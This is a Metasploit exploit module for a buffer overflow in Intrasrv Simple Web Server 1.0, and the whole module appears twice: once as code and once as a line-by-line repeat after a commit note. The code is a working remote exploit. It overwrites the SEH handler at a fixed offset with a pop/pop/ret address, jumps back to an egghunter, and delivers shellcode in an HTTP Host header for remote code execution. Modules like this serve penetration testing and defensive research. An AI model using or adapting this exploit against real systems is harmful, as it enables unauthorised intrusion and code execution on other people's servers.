metasploit-framework/modules/exploits/windows/http/intrasrv_bof.rb

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = NormalRanking

	include Msf::Exploit::Remote::Tcp
	include Msf::Exploit::Egghunter

	def initialize(info={})
		super(update_info(info,
			'Name'           => "Intrasrv 1.0 Buffer Overflow",
			'Description'    => %q{
					    This module exploits a boundary condition error in Intrasrv
					Simple Web Server 1.0. The web interface does not validate the 
					boundaries of an HTTP request string prior to copying the data
					to an insufficiently large buffer. Successful exploitation leads 
					to arbitrary remote code execution in the context of the application. 
			},
			'License'        => MSF_LICENSE,
			'Author'         =>
				[
					'xis_one@STM Solutions',  #Discovery, PoC
					'PsychoSpy <neinwechter[at]gmail.com>' #Metasploit
				],
			'References'     =>
				[
					['OSVDB', '94097'],
					['EDB','18397'],
					['BID','60229']
				],
			'Payload'        =>
				{
					'StackAdjustment' => -3500,
					'BadChars' => "\x00"
				},
			'DefaultOptions'  =>
				{
					'ExitFunction' => "thread"
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					['v1.0 - XP/2003/Win7',
						{
							'Offset' => 1553,
							'Ret'=>0x004097dd #p/p/r - intrasrv.exe
						}
					]
				],
			'Privileged'     => false,
			'DisclosureDate' => "May 30 2013",
			'DefaultTarget'  => 0))

			register_options(
				[
					OptPort.new('RPORT', [true, 'The remote port', 80])
				], self.class)
	end

	def check
		begin
			connect
		rescue
			print_error("Could not connect to target!")
			return Exploit::CheckCode::Safe
		end
		sock.put("GET / HTTP/1.0\r\n")
		res = sock.get

		if res and res =~ /intrasrv 1.0/
			return Exploit::CheckCode::Vulnerable
		else
			return Exploit::CheckCode::Safe
		end
	end

	def exploit
		# setup egghunter
		hunter,egg = generate_egghunter(payload.encoded, payload_badchars, {
				:checksum => true
			})
		
		# setup buffer
		buf = rand_text_alpha(target['Offset']-128)		# junk to egghunter
		buf << make_nops(8) + hunter				# nopsled + egghunter at offset-128
		buf << rand_text_alpha(target['Offset']-buf.length)	# more junk to offset
		buf << "\xeb\x80\x90\x90" 				# nseh - jmp -128 to egghunter
		buf << [target.ret].pack("V*") 				# seh

		# attach egg tag to payload
		shellcode = egg + egg
		shellcode << payload.encoded

		print_status("Sending buffer...")
		connect
		sock.put("GET / HTTP/1.0\r\nHost: #{buf}\r\n#{shellcode}")
		disconnect
	end
end
Added Intrasrv 1.0 BOF 2013-08-10 19:56:07 +00:00			`##`
			`# This file is part of the Metasploit Framework and may be subject to`
			`# redistribution and commercial restrictions. Please see the Metasploit`
			`# Framework web site for more information on licensing and terms of use.`
			`# http://metasploit.com/framework/`
			`##`

			`require 'msf/core'`

			`class Metasploit3 < Msf::Exploit::Remote`
			`Rank = NormalRanking`

			`include Msf::Exploit::Remote::Tcp`
			`include Msf::Exploit::Egghunter`

			`def initialize(info={})`
			`super(update_info(info,`
			`'Name' => "Intrasrv 1.0 Buffer Overflow",`
			`'Description' => %q{`
			`This module exploits a boundary condition error in Intrasrv`
			`Simple Web Server 1.0. The web interface does not validate the`
			`boundaries of an HTTP request string prior to copying the data`
			`to an insufficiently large buffer. Successful exploitation leads`
			`to arbitrary remote code execution in the context of the application.`
			`},`
			`'License' => MSF_LICENSE,`
			`'Author' =>`
			`[`
			`'xis_one@STM Solutions', #Discovery, PoC`
			`'PsychoSpy <neinwechter[at]gmail.com>' #Metasploit`
			`],`
			`'References' =>`
			`[`
			`['OSVDB', '94097'],`
			`['EDB','18397'],`
			`['BID','60229']`
			`],`
			`'Payload' =>`
			`{`
			`'StackAdjustment' => -3500,`
			`'BadChars' => "\x00"`
			`},`
			`'DefaultOptions' =>`
			`{`
			`'ExitFunction' => "thread"`
			`},`
			`'Platform' => 'win',`
			`'Targets' =>`
			`[`
			`['v1.0 - XP/2003/Win7',`
			`{`
			`'Offset' => 1553,`
			`'Ret'=>0x004097dd #p/p/r - intrasrv.exe`
			`}`
			`]`
			`],`
			`'Privileged' => false,`
			`'DisclosureDate' => "May 30 2013",`
			`'DefaultTarget' => 0))`

			`register_options(`
			`[`
			`OptPort.new('RPORT', [true, 'The remote port', 80])`
			`], self.class)`
			`end`

			`def check`
			`begin`
			`connect`
			`rescue`
			`print_error("Could not connect to target!")`
			`return Exploit::CheckCode::Safe`
			`end`
			`sock.put("GET / HTTP/1.0\r\n")`
			`res = sock.get`

			`if res and res =~ /intrasrv 1.0/`
			`return Exploit::CheckCode::Vulnerable`
			`else`
			`return Exploit::CheckCode::Safe`
			`end`
			`end`

			`def exploit`
			`# setup egghunter`
			`hunter,egg = generate_egghunter(payload.encoded, payload_badchars, {`
			`:checksum => true`
			`})`

			`# setup buffer`
			`buf = rand_text_alpha(target['Offset']-128) # junk to egghunter`
			`buf << make_nops(8) + hunter # nopsled + egghunter at offset-128`
			`buf << rand_text_alpha(target['Offset']-buf.length) # more junk to offset`
			`buf << "\xeb\x80\x90\x90" # nseh - jmp -128 to egghunter`
			`buf << [target.ret].pack("V*") # seh`

			`# attach egg tag to payload`
			`shellcode = egg + egg`
			`shellcode << payload.encoded`

			`print_status("Sending buffer...")`
			`connect`
			`sock.put("GET / HTTP/1.0\r\nHost: #{buf}\r\n#{shellcode}")`
			`disconnect`
			`end`
			`end`